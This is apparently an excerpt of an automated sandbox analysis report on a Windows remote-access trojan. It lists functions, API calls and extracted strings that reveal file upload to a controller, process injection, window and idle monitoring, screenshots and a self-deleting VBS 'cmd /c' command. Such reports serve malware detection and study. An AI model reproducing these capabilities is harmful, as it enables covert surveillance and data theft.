            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
            • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
            • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
            • API String ID: 193334293-3226144251
            • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
            • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
            • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
            • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
            Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
            Download Yara Rule
            APIs
            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
            • RegCloseKey.ADVAPI32(?), ref: 0041A749
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEnumOpen
            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
            • API String ID: 1332880857-3714951968
            • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
            • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
            • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
            • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
            Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
            Download Yara Rule
            APIs
            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
            • GetCursorPos.USER32(?), ref: 0041B39E
            • SetForegroundWindow.USER32(?), ref: 0041B3A7
            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
            • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
            • ExitProcess.KERNEL32 ref: 0041B41A
            • CreatePopupMenu.USER32 ref: 0041B420
            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
            • String ID: Close
            • API String ID: 1657328048-3535843008
            • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
            • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
            • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
            • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
            Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$Info
            • String ID:
            • API String ID: 2509303402-0
            • Opcode ID: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
            • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
            • Opcode Fuzzy Hash: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
            • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
            Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
            • __aulldiv.LIBCMT ref: 00407D89
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
            • CloseHandle.KERNEL32(00000000), ref: 00407FA0
            • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
            • CloseHandle.KERNEL32(00000000), ref: 00408038
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
            • API String ID: 3086580692-2596673759
            • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
            • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
            • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
            • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
            Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
            • ExitProcess.KERNEL32 ref: 0040C57D
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
            • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
            • API String ID: 1913171305-2600661426
            • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
            • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
            • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
            • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
            Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
            Download Yara Rule
            APIs
            • connect.WS2_32(?,?,?), ref: 004048C0
            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
            • WSAGetLastError.WS2_32 ref: 00404A01
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CreateEvent$ErrorLastLocalTimeconnect
            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
            • API String ID: 994465650-2151626615
            • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
            • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
            • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
            • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
            Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
            • __dosmaperr.LIBCMT ref: 00452ED6
            • GetFileType.KERNEL32(00000000), ref: 00452EE2
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
            • __dosmaperr.LIBCMT ref: 00452EF5
            • CloseHandle.KERNEL32(00000000), ref: 00452F15
            • CloseHandle.KERNEL32(00000000), ref: 0045305F
            • GetLastError.KERNEL32 ref: 00453091
            • __dosmaperr.LIBCMT ref: 00453098
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
            • String ID: H
            • API String ID: 4237864984-2852464175
            • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
            • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
            • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
            • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
            Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: 65535$udp
            • API String ID: 0-1267037602
            • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
            • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
            • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
            • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
            Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 00409C81
            • Sleep.KERNEL32(000001F4), ref: 00409C8C
            • GetForegroundWindow.USER32 ref: 00409C92
            • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
            • Sleep.KERNEL32(000003E8), ref: 00409D9D
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
            • String ID: [${ User has been idle for $ minutes }$]
            • API String ID: 911427763-3954389425
            • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
            • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
            • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
            • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
            Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
            Download Yara Rule
            APIs
            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LongNamePath
            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
            • API String ID: 82841172-425784914
            • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
            • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
            • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
            • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
            Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
            • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
            • __dosmaperr.LIBCMT ref: 00438646
            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
            • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
            • __dosmaperr.LIBCMT ref: 00438683
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
            • __dosmaperr.LIBCMT ref: 004386D7
            • _free.LIBCMT ref: 004386E3
            • _free.LIBCMT ref: 004386EA
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
            • String ID:
            • API String ID: 2441525078-0
            • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
            • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
            • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
            • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
            Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free
            • String ID: pF$tF
            • API String ID: 269201875-2954683558
            • Opcode ID: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
            • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
            • Opcode Fuzzy Hash: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
            • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
            Function 0040971E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 163sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNEL32(00001388), ref: 00409738
              • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
              • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
              • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
              • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
            • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
            • String ID: 05#v`#v$H"G$H"G
            • API String ID: 3795512280-268818530
            • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
            • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
            • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
            • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
            Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
            Download Yara Rule
            APIs
            • SetEvent.KERNEL32(?,?), ref: 0040549F
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
            • TranslateMessage.USER32(?), ref: 0040555E
            • DispatchMessageA.USER32(?), ref: 00405569
            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
            • String ID: CloseChat$DisplayMessage$GetMessage
            • API String ID: 2956720200-749203953
            • Opcode ID: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
            • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
            • Opcode Fuzzy Hash: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
            • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
            Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
            • CloseHandle.KERNEL32(00000000), ref: 00416123
            • DeleteFileA.KERNEL32(00000000), ref: 00416132
            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
            • String ID: <$@$@%G$@%G$Temp
            • API String ID: 1704390241-4139030828
            • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
            • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
            • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
            • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
            Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
            • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
            • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
            • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
            Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00445645
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00445651
            • _free.LIBCMT ref: 0044565C
            • _free.LIBCMT ref: 00445667
            • _free.LIBCMT ref: 00445672
            • _free.LIBCMT ref: 0044567D
            • _free.LIBCMT ref: 00445688
            • _free.LIBCMT ref: 00445693
            • _free.LIBCMT ref: 0044569E
            • _free.LIBCMT ref: 004456AC
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
            • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
            • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
            • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
            Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
            Download Yara Rule
            APIs
            • __EH_prolog.LIBCMT ref: 00417F6F
            • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
            • Sleep.KERNEL32(000003E8), ref: 004180B3
            • GetLocalTime.KERNEL32(?), ref: 004180BB
            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
            • API String ID: 489098229-3790400642
            • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
            • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
            • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
            • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
            Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DecodePointer
            • String ID: acos$asin$exp$log$log10$pow$sqrt
            • API String ID: 3527080286-3064271455
